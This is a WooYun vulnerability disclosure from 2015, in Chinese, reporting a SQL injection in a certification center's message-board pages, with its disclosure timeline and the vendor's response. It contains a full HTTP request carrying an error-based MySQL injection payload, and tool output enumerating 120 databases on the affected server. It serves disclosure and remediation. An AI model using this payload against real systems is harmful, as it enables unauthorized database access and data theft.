当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163019

漏洞标题:北京中轻联认证中心注入漏洞

相关厂商:北京中轻联认证中心

漏洞作者: 不败顽童

提交时间:2015-12-21 23:48

修复时间:2016-02-08 18:23

公开时间:2016-02-08 18:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-25: 厂商已经确认,细节仅向厂商公开
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2016-02-08: 细节向公众公开

简要描述:

北京中轻联认证中心注入漏洞

详细说明:

POST /piw/MessageBoard/doSaveMessage.jsp HTTP/1.1
Content-Length: 375
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=94C525CEEFDE72CCA98BE947431EE0FC
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Code=test&Content=&cssName=css.css&DataId=10086&Messagebordid=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(106)%2cCHAR(68)%2cCHAR(50)%2cCHAR(97)%2cCHAR(71)%2cCHAR(79)%2cCHAR(119)%2cCHAR(81))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Name=e&pageNum=&size=5&Type=0
还有以下页面存在注入:
/piw/MessageBoard/message.jsp

漏洞证明:

2015-12-20_21-31-11.jpg


available databases [120]:
[*] amtk
[*] angang
[*] axjj
[*] axjj2
[*] bac
[*] bac2
[*] baitong
[*] bbs_crb_com_cn
[*] bbs_freqchina_com
[*] bdzy
[*] biaozhun
[*] bjays
[*] bjldly
[*] bjzql
[*] blny
[*] blny2
[*] blwy
[*] blwy2
[*] bomd
[*] bsyy
[*] cclc
[*] cda
[*] cda2
[*] cnnongfu
[*] cpbz
[*] cyz
[*] dfzt
[*] dhy
[*] discuz
[*] dizhen
[*] dizhen2
[*] dizhen3
[*] dtgy
[*] dwwsjds
[*] dwwsjds2
[*] fangda
[*] fangda2
[*] fztz
[*] gdt
[*] gdtnew
[*] gjaqkj
[*] gjhg
[*] gjhg2
[*] gmbwg
[*] gtzy
[*] gxbzscq
[*] hdrk
[*] hjbh
[*] hjbh2
[*] hope
[*] hope2
[*] hswj
[*] huagong
[*] huagong2
[*] huayan
[*] hxdc
[*] hyt
[*] hzsy
[*] information_schema
[*] jhsj
[*] jinke
[*] jq
[*] jq2
[*] jrzkj
[*] jxl
[*] jxl2
[*] jydj
[*] jyzxlm
[*] kdsl
[*] ldch
[*] mdy
[*] mscf
[*] mysql
[*] nyhd
[*] nyhd2
[*] prs
[*] prs2
[*] qwhc
[*] rdkj
[*] rggd
[*] rggd2
[*] rlwy
[*] room
[*] room2
[*] scaler
[*] sjbr
[*] sjch
[*] sjoj
[*] sksh
[*] slhp
[*] smltzw
[*] taihao
[*] taihao2
[*] test
[*] tjzm
[*] tjzm2
[*] trade
[*] trade2
[*] ucenter
[*] yfs
[*] yfs2
[*] yjjy
[*] yjjy2
[*] ylzscq
[*] ymly
[*] yxdz
[*] yxtz
[*] yxtz2
[*] zggjmtdh
[*] zggjmtdh2
[*] zgnf
[*] zgxxw
[*] zgym
[*] zhuanye
[*] zhxd
[*] zql
[*] zql2
[*] zuyong
[*] zyhw
[*] zyhw2

修复方案:

屏蔽特殊字符

版权声明:转载请注明来源 不败顽童@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-25 18:52

厂商回复:

CNVD未复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置。

最新状态:

暂无